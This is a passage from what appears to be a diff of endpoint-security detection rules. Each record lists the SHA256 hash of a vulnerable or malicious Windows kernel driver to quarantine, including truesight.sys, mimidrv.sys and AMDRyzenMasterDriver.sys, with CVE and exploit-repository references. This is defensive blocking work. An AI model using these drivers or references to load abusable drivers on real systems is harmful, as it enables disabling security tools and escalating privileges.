+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823088Z",
+ "creation_date": "2026-03-23T11:45:30.823090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e7b92e6a1f656a70ed56ef2a190fce6bb3f12063b891fbfd722ca4e951de15f",
+ "comment": "Vulnerable Kernel Driver (aka FH-EtherCAT_DIO.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c43c7e1-90a7-5a28-8033-7075f6503569",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471963Z",
+ "creation_date": "2026-03-23T11:45:31.471966Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ab9c0033fe779dba2bf6f906ab9efff7ae2ba6c89616b8a4529c9e74bf7a388",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c5d9dc9-affa-5db5-bfa8-fbd0cf5488fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498759Z",
+ "creation_date": "2026-03-23T11:45:31.498761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498766Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4888e5bb988e9b5058dfe0231c2ceb7a2312a24a8451b1171a45941ff82f41d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c6346cd-6873-5155-9a29-9b96ef8fd4bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809236Z",
+ "creation_date": "2026-03-23T11:45:31.809239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "857e860762ee61ba6c1830fe0535c2c252e41facfba7237afc32def9a5338257",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c70c1ba-d5cb-57db-8b8b-719fa836280e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979481Z",
+ "creation_date": "2026-03-23T11:45:29.979483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6f764c3b5580cd1675cbf184938ad5a201a8c096607857869bd7c3399df0d12",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c72b120-df7a-56cc-8d96-efe81acea998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610014Z",
+ "creation_date": "2026-03-23T11:45:29.610016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "253ed7f5c7115e957dfdb1f5c6c51592b491a70b27787903c8fd848e45b9cf22",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c73769b-76b1-58fc-836f-3d4257efc14b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807310Z",
+ "creation_date": "2026-03-23T11:45:31.807312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807318Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db4acfc49be21a6fa503473ab2fd5573660f9c426f57de54f99c1b69ab634d42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c839334-c76e-57f0-b0e6-59d085100b28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812674Z",
+ "creation_date": "2026-03-23T11:45:31.812678Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812687Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4610c4d17ba378f06dd4fe2ad8be4d9c49c5a27185fe36b29afc9f9c39330df0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c855a93-006c-5a14-86cb-3feb502b6bef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833810Z",
+ "creation_date": "2026-03-23T11:45:30.833813Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833822Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d373400b4c6093dc6c06d5228d6f5419d16e1084c7ee2748e867e8acfc36e635",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c8cb881-f36d-57f8-bb4e-e8a471aaeb89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498119Z",
+ "creation_date": "2026-03-23T11:45:31.498123Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34c7a941c54c83fd0a9656918315d4544ecfba933e18d30d1aeef8ae634ec8e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c8dba25-79ab-5b2b-8c9d-7c5a80e20caa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477931Z",
+ "creation_date": "2026-03-23T11:45:31.477935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477945Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dee1a21f277a107ad0f8e76e42cbd255e529f87bb1b16d64bd79771a7270ed4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c915589-86f6-50a7-a39f-f3cae1dc435e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823608Z",
+ "creation_date": "2026-03-23T11:45:30.823610Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3552940a50d22dd481c5b5cc5f76b98cf57bae05741a813647f88d84a9a48b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c934d41-eb80-5e55-bbaf-5d6546a15fc8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463042Z",
+ "creation_date": "2026-03-23T11:45:30.463045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2da2b883e48e929f5365480d487590957d9e6582cc6da2c0b42699ba85e54fe2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c939e3f-0d92-5a3d-b40d-d1d29d972fd7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979995Z",
+ "creation_date": "2026-03-23T11:45:29.979997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb",
+ "comment": "Vulnerable Kernel Driver (aka Monitor_win10_x64.sys) [https://www.loldrivers.io/drivers/ca415ed5-b611-4840-bfb2-6e1eacac33d1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c9aa0e8-808f-5103-b7f5-f0774686e9e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973827Z",
+ "creation_date": "2026-03-23T11:45:29.973829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89108a15f009b285db4ef94250b889d5b11b96b4aa7b190784a6d1396e893e10",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c9b1b13-14f1-5199-b92b-db5d1d503e11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463526Z",
+ "creation_date": "2026-03-23T11:45:30.463531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a78c9871da09fab21aec9b88a4e880f81ecb1ed0fa941f31cc2f041067e8e972",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ca3fb71-5f7f-5b73-bf66-91372bf455ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142593Z",
+ "creation_date": "2026-03-23T11:45:31.142595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac916d75cd309ea2f40e7a75c645a52e5f1fc39827605b05f4968dcd2b059ab3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cab0cb2-a8d0-552a-9d2b-1e76d389454b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148916Z",
+ "creation_date": "2026-03-23T11:45:31.148919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39b976b15968a825cb241307a47dfd03cd263c2d6dc583741c8937264b0dfa1f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb2016b-cba2-5145-944f-c88293c178c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481623Z",
+ "creation_date": "2026-03-23T11:45:30.481624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481630Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2dee316cd07963c2eb7ebb1b4189eca78786c835aaafeb6467b37c1353d821a",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb5907d-8057-51af-8865-016f2192220d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825277Z",
+ "creation_date": "2026-03-23T11:45:31.825281Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825291Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b3c82a363f5f4cd33100619977fa030b40aecf139145534649fb9855a94d06c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb77c52-f623-57cc-9479-8dd7acf979d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481731Z",
+ "creation_date": "2026-03-23T11:45:30.481733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19595c3de596f8b705eef1b135768d3051305698ceed083401f8acfba4bd5393",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb948a1-79ee-56b4-b7e7-e09f8e14b1e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975060Z",
+ "creation_date": "2026-03-23T11:45:29.975062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5251d84f6dab1327b2f1ea0c5ccbe4b2790ae6eda0e20aa9d9acfc01e427fd9",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cbdb0de-3ff9-56a5-85ca-6f599768f2c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
